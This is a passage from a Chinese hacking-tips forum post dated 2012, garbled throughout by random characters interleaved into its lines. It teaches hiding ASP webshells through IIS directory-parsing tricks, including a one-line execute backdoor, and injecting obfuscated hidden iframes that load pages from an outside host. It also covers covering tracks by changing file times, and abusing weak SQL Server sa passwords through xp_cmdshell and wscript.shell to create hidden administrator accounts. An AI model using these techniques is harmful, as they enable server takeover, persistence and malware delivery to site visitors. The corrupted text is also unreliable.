( g, {& n* d0 K用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& p$ n5 d! g* j' D" T5 F T) M7 W
: I# X* I- A9 F5 F- f2 t+ u' j53、隐藏ASP后门的两种方法" m+ C) U# Q" }
1、建立非标准目录:mkdir images..\
/ k/ M; E8 L: T" b! I% G; x拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp1 S+ Q# Q7 e: u/ d/ P5 m8 ?# u
通过web访问ASP木马:http://ip/images../news.asp?action=login2 W% I# \ G8 i! ~1 C7 v b' l
如何删除非标准目录:rmdir images..\ /s' U' j4 H1 `" h8 W& Y# W+ c* L+ ?5 P, g
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* _4 e# j& w' r( T: G% N! Smkdir programme.asp: J; E+ u1 Q- i: Z: m' p
新建1.txt文件内容:<!--#include file=”12.jpg”-->
9 C3 b9 y) b2 n新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 t8 v! B) |- a3 Q4 xattrib +H +S programme.asp
& w# n" a- V$ \7 t通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; ]* n7 a+ x! g
7 Z+ [: g! I0 p3 I" e0 t
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; V/ r5 z0 s, }: t3 v2 W, Q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
$ j* e# z8 G, v, R3 E! u0 [+ o
7 A# w* M' v- Z55、JS隐蔽挂马
# |! r+ K# Q5 ^$ U1.! V6 X3 O& Y* b
var tr4c3="<iframe src=ht";
5 t3 R0 z* A% O# O/ q* ]tr4c3 = tr4c3+"tp:/";
8 A$ b9 e Q5 g& S }+ K5 ?/ K( [tr4c3 = tr4c3+"/ww";) J% e' E- d8 F* X8 H4 r
tr4c3 = tr4c3+"w.tr4";
' N+ [) @4 S& Xtr4c3 = tr4c3+"c3.com/inc/m";4 B% c7 {! [. J# l3 k, t5 J
tr4c3 = tr4c3+"m.htm style="display:none"></i";
; v p% g; `- Q) P. d! `$ S0 \" Z; Q# M. ^tr4c3 =tr4c3+"frame>'";
, p' ~, T$ ^; w+ B! v1 Y3 vdocument.write(tr4c3);9 `0 T& p4 p# x$ _! t
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
: S5 c& U( j+ }# j/ H; G7 X2 `4 n8 Z9 C5 H+ Z
2.$ J$ i+ N1 W7 _) x
转换进制,然后用EVAL执行。如
' V3 Q4 h1 x5 {2 r; @% ] [eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
8 s7 j2 I) g: h' y# N不过这个有点显眼。: ?$ J( h+ @3 S2 A5 ?! `
3.
8 I9 i+ h, o/ b: z" h3 `% h kdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
# C% _/ W& n7 i/ i/ m最后一点,别忘了把文件的时间也修改下。
' Z+ ^- N$ d0 Y# o5 X
! X" a2 o2 V9 P; ~' {56.3389终端入侵常用DOS命令0 a3 z1 U% w, M
taskkill taskkill /PID 1248 /t' Y/ {: _, e% |; M2 ]& F6 J) e8 b
% j2 ?# Z- Q J' ^
tasklist 查进程
( E: b! d; J r
- k* O: s% i$ h% T) }2 lcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 Z( L. W+ x: s W
iisreset /reboot7 w3 w5 Q- l8 F) X7 t2 x
tsshutdn /reboot /delay:1 重起服务器2 B O' B9 B; D6 r
! w" B2 C0 M. _2 ^/ W& T- C. dlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
- G& Z( d2 F/ V3 q2 ~. D
+ E% G7 j' Z% a( P0 u0 ?7 v+ [query user 查看当前终端用户在线情况
* h/ S* Y2 v9 X( Z0 ^2 S) K' C; j
+ n7 y" R# ^2 `$ k要显示有关所有会话使用的进程的信息,请键入:query process *# n& {% N) E' S1 E
, g# v& ?0 d3 g6 ^# Y9 I要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
9 {4 j1 B- c2 J2 `& [3 R* I% z/ S; P/ | O3 |* i0 ~4 `
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
% v" x9 B+ k7 Q5 P
; B. c- \- H( W8 A要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM020 i, |. U) X; G) ~4 }
5 @6 x, ~9 F7 A: _9 ` B
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启. ^* H6 [$ q g+ y, C
* m3 ?; N3 D- o2 X5 L: i5 M
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
( Y! E0 w& X( P6 P: w$ y9 H* I$ D/ T9 k, T
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ ^" v+ h6 d& P ^" I
4 E" U0 R( q" [% E5 B! V q) Z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机* B4 N' S% L* `; |/ Q
& B; Q, E) }' k3 A56、在地址栏或按Ctrl+O,输入:
* c) C; S. W3 l7 {* Ujavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;% J$ {/ |. G+ o( g9 ]: Q' V
" l7 V, s' ^+ w
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 Y1 n) n9 v6 |- q* e
) Z% B- Q5 ~8 F1 W& G57、net user的时候,是不能显示加$的用户,但是如果不处理的话,: c) C2 n8 |7 X0 a& D6 z3 V2 t0 `
用net localgroup administrators是可以看到管理组下,加了$的用户的。
( d0 F3 n2 W6 u, g5 [: U; W8 C6 C2 Z; J
58、 sa弱口令相关命令
2 @2 U8 ]* ~/ Q* C j( W
/ e+ Z# Y, @0 z0 Q4 f' t: K- G" A一.更改sa口令方法:
$ p9 r7 W) S( U! u1 P) t5 V6 O4 n用sql综合利用工具连接后,执行命令:% U4 o9 f/ L! ]5 H% w
exec sp_password NULL,'20001001','sa'6 {- b* |" x1 q; [
(提示:慎用!)+ I( d( q. ~2 {
1 j) h2 n+ z3 u) I8 c7 G8 M
二.简单修补sa弱口令.
5 w. R; o5 Z( U) T# B1 E9 b0 {3 H: Z) {" U3 ~& r5 N# o9 B0 B4 e, `
方法1:查询分离器连接后执行:
8 ^* c& H: o* kif exists (select * from# j: e/ G1 q2 c9 w+ h
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and. f1 K( w9 Y6 @# {# s
OBJECTPROPERTY(id, N'IsExtendedProc') = 1). B- Z7 ~6 q8 R% o
8 T: T1 N3 W0 ~ }" ^# l$ Y/ m. o9 Fexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'1 i% T& H* T8 o5 }; E4 b% N
& V; ]* u0 W: o5 [$ {
GO
: B. E7 j5 c/ c+ \, F9 g7 o8 I$ B) ]" n, j
然后按F5键命令执行完毕9 m7 `2 ?6 C: {$ Y' c, c6 h( a
5 }2 B, ~! s! d1 n6 Q& K7 ^; ~
方法2:查询分离器连接后
; h# R' n+ I: w* J4 P( |第一步执行:use master
' v# ]. N% f& h/ p0 p' j& J: m第二步执行:sp_dropextendedproc 'xp_cmdshell'! ]- J2 r5 n! P5 z
然后按F5键命令执行完毕1 n+ U1 J* D- q* X- {0 F) }1 G5 {
, K6 |& K1 c) m, C6 D
7 n. G/ w Y' y) J7 S: Y
三.常见情况恢复执行xp_cmdshell.
8 C9 v% a9 E }6 s- Z. ~ K& {* _1 J' V
3 s! _% `4 T4 a, p! t7 t
1 未能找到存储过程'master..xpcmdshell'.
( D. Y j2 S- D9 g 恢复方法:查询分离器连接后,
: R3 |+ h9 |7 M, i- g' S" z第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int# ]% a. i1 d% m: ?- e; j2 o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 P0 _5 R$ Z" J ]然后按F5键命令执行完毕
3 G3 m9 u7 m+ m1 |. |- k+ P# {: |8 {7 v
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 y" E9 r: {" \恢复方法:查询分离器连接后," T, @) C9 P4 _) t$ m
第一步执行:sp_dropextendedproc "xp_cmdshell". V2 o7 x$ G2 f! g* A, _
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( [, e7 B) w) u: F# X: z/ \
然后按F5键命令执行完毕
% \7 D* l* P* F+ k& B) c4 h; j& N! [! f! ?2 o$ ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
, Y- R# \! J2 I `5 u9 \" `恢复方法:查询分离器连接后,+ n! `" {' r* s- G- y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. T: U. x$ z4 f: I, x
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
% M8 ^1 O' J- O8 v4 y然后按F5键命令执行完毕7 F2 r- v& t" f6 @8 ~: P/ m& F- ~
! ~6 L' {$ ~' Y; W+ Y4 K6 n
四.终极方法.# h5 V! a D; y" O, y/ Z
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. E# c' i: w. n' a) [/ B$ S4 l" Z* F查询分离器连接后,! T7 I% h6 A' u6 R* X( S; J
2000servser系统:
# \) L* u7 g* Q" |( ]- C5 x5 @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
9 M& D4 a+ ]+ D
9 H Z* T# v# V7 O1 C4 P( o1 Z" ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* E9 x; v0 B' Z9 n, h. s$ g$ `6 H5 g' i: P, {- A2 a9 E$ P
xp或2003server系统:% M- r- s0 z; S" ]/ L
* l" [% x- l/ z! L' p7 ]" |0 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'8 A9 h% r6 `5 B2 Q/ L; n" J0 u z
# ^: T% I u5 F# ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'. h. @- H n! e
|
发表于 2012-9-15 14:13:15
收藏
支持
反对